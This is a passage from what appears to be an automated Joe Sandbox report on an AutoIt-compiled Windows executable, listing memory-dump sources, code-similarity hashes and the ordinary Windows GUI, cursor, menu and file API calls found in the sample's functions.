                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                              • String ID:
                                                                              • API String ID: 2054058615-0
                                                                              • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                              • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                              • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                              • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 0
                                                                              • API String ID: 0-4108050209
                                                                              • Opcode ID: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                                                                              • Instruction ID: a4e6889c8706d2a682ad3cc8acca51b009283e1ae9b51da70db0806919efebf9
                                                                              • Opcode Fuzzy Hash: 0476511f06c615c4519fb5d0bdcf97e6c9114ef5bab3d74fcb2069946f87bde7
                                                                              • Instruction Fuzzy Hash: 95C104723403416BF3209B64DC46FBBB794EB95321F04453FFA45D62C1EBBA9409876A
                                                                              APIs
                                                                                • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                              • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                              • GetClientRect.USER32(?,?), ref: 004701FA
                                                                              • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                              • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                              • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                              • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                              • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                              • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                              • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                              • GetClientRect.USER32(?,?), ref: 00470371
                                                                              • GetStockObject.GDI32(00000011), ref: 00470391
                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                              • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                              • String ID: AutoIt v3 GUI
                                                                              • API String ID: 867697134-248962490
                                                                              • Opcode ID: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                              • Instruction ID: 96ed3905d942d8c5c267f8207effb08aff50268186fc7250a269a1908d1679c9
                                                                              • Opcode Fuzzy Hash: 2f3c1093d205cc919e8fce6edce52452572e464071e7d7185a704cd66ddcb838
                                                                              • Instruction Fuzzy Hash: 27B19F71205301AFD324DF68DD45B6BB7E4FB88710F108A2EFA9587290DBB5E844CB5A
                                                                              APIs
                                                                              • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window
                                                                              • String ID: 0
                                                                              • API String ID: 2353593579-4108050209
                                                                              • Opcode ID: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                              • Instruction ID: 13976ff69904029c6bcd7d6129a783336058688c161485e0dcc644b2654616cc
                                                                              • Opcode Fuzzy Hash: ca380a5f1b7b22306afb7d181ee8588f63c71b92ae7430e038360cbc2591eaeb
                                                                              • Instruction Fuzzy Hash: 94B19DB02443419FF324CF14C889BABBBE4EB89744F14491EF991972D1DBB8E845CB5A
                                                                              APIs
                                                                              • GetSysColor.USER32 ref: 0044A11D
                                                                              • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                              • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                              • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                              • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                              • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                              • GetWindowDC.USER32 ref: 0044A277
                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                              • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                              • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                              • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                              • String ID:
                                                                              • API String ID: 1744303182-0
                                                                              • Opcode ID: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                              • Instruction ID: f407f88e1fc9bdd08975b2e96734b256c85d8f08b0ead5e1f8dbf5832e348edb
                                                                              • Opcode Fuzzy Hash: c697551d262e08263a45fd1ab6b47457a8b4de30e4a023901e5f3e03e0b3260a
                                                                              • Instruction Fuzzy Hash: AD6148315442016BE3209B388C88BBFB7A4FB49324F54079EF9A8973D0D7B99C51D76A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$__wcsnicmp
                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                              • API String ID: 790654849-1810252412
                                                                              • Opcode ID: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                              • Instruction ID: 1b62209f2aa4de5792947d5a3aa61dcd1c874d3672784017b8f4b2c72f71c34c
                                                                              • Opcode Fuzzy Hash: 3ef763bd77a89c14e9ef14da431a542ecfa9ee53dca0875bc5fd58ba0035de2e
                                                                              • Instruction Fuzzy Hash: 7A3193B1644301A7CA00FA61DC83F5B73A85F54759F100A3FB955B61D6FA6CEA0C862F
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID:
                                                                              • API String ID: 1927566239-0
                                                                              • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                              • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                              • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                              • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                              APIs
                                                                                • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                              • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                              • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                              • IsWindow.USER32(?), ref: 0046DBDE
                                                                              • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                              • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                              • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnumForegroundWindows_wcslen$ChildDesktop
                                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                              • API String ID: 1322021666-1919597938
                                                                              • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                              • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                              • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                              • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                              APIs
                                                                              • GetLocalTime.KERNEL32(?), ref: 0045DED4
                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0045DEE4
                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0045DEF0
                                                                              • _wcsncpy.LIBCMT ref: 0045DF0F
                                                                              • __wsplitpath.LIBCMT ref: 0045DF54
                                                                              • _wcscat.LIBCMT ref: 0045DF6C
                                                                              • _wcscat.LIBCMT ref: 0045DF7E
                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045DF93
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFA7
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFE5
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045DFFB
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0045E00D
                                                                              • _wcscpy.LIBCMT ref: 0045E019
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0045E05F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory$Time$File$Local_wcscat$System__wsplitpath_wcscpy_wcsncpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3201719729-438819550
                                                                              • Opcode ID: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                              • Instruction ID: 9ef8ac46b2ec3f8a2b66e183c5d6435db2730cdd54c1860218fefef83dfd89d7
                                                                              • Opcode Fuzzy Hash: 89541da3f554ebb8d42e95f45bc66f31ca584aff69b040987f949bd9346ecb30
                                                                              • Instruction Fuzzy Hash: D061A7B25043049BC724EF65C881E9FB3E8AF94704F048E1EF98987241DB79E949CB96
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsicoll$IconLoad
                                                                              • String ID: blank$info$question$stop$warning
                                                                              • API String ID: 2485277191-404129466
                                                                              • Opcode ID: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                              • Instruction ID: 3fdcc892c2a25cebf9aff257507665a297d4e16c4260cb8f6e9492a672fb13e0
                                                                              • Opcode Fuzzy Hash: 5bed60ec3368b378429e4d7d86c3e9ed6cb6a0c6f582f3c961ebbe10ae210b10
                                                                              • Instruction Fuzzy Hash: CB2128B6B08301A7D610A725BC05FDF27489FA8365F004C2BF941E2283F3A8A45583BD
                                                                              APIs
                                                                              • CompareStringW.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428611
                                                                              • GetLastError.KERNEL32(?,?,004832AC,00000001,004832AC,00000001), ref: 00428627
                                                                              • strncnt.LIBCMT ref: 00428646
                                                                              • strncnt.LIBCMT ref: 0042865A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: strncnt$CompareErrorLastString
                                                                              • String ID:
                                                                              • API String ID: 1776594460-0
                                                                              • Opcode ID: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                              • Instruction ID: 056e5a993d73ec50dc3c8e072878bb631c9b69e1f80941a2a69bbd8adeb14d7f
                                                                              • Opcode Fuzzy Hash: 16ce8c3a65625fd7540c51b5c1254bfa478756f7f63d0819a38d9cd03b2976a4
                                                                              • Instruction Fuzzy Hash: 0DA1B131B01225AFDF219F61EC41AAF7BB6AF94340FA4402FF81196251DF3D8891CB58
                                                                              APIs
                                                                              • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                              • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                              • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                              • GetWindowRect.USER32(?,?), ref: 00454688
                                                                              • SetWindowTextW.USER32(?,?), ref: 004546FD
                                                                              • GetDesktopWindow.USER32 ref: 00454708
                                                                              • GetWindowRect.USER32(00000000), ref: 0045470F
                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                              • GetClientRect.USER32(?,?), ref: 0045476F
                                                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                              • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                              • String ID:
                                                                              • API String ID: 3869813825-0
                                                                              • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                              • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                              • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                              • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                              APIs
                                                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                              • GetCursorInfo.USER32 ref: 00458E03
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$Load$Info
                                                                              • String ID:
                                                                              • API String ID: 2577412497-0
                                                                              • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                              • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                              • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                              • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                              • GetFocus.USER32 ref: 004696E0
                                                                              • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
Similarity
• API ID: MessagePost$CtrlFocus
• String ID: 0
• API String ID: 1534620443-4108050209
APIs
• _memset.LIBCMT ref: 00468107
• GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
• GetMenuItemCount.USER32(?), ref: 00468227
• DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
• DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
• DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
• DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
• GetMenuItemCount.USER32 ref: 004682DC
• SetMenuItemInfoW.USER32 ref: 00468317
• GetCursorPos.USER32(00000000), ref: 00468322
• SetForegroundWindow.USER32(?), ref: 0046832D
• TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
• PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
Strings
Similarity
• API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
• String ID: 0
• API String ID: 3993528054-4108050209
APIs
• DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
  • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
  • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
  • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
• SendMessageW.USER32(?), ref: 0046F34C
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
• _wcscat.LIBCMT ref: 0046F3BC
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
• SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
• SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
• DragFinish.SHELL32(?), ref: 0046F414
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
Strings
Similarity
• API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 4085615965-3440237614
APIs
Strings
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
APIs
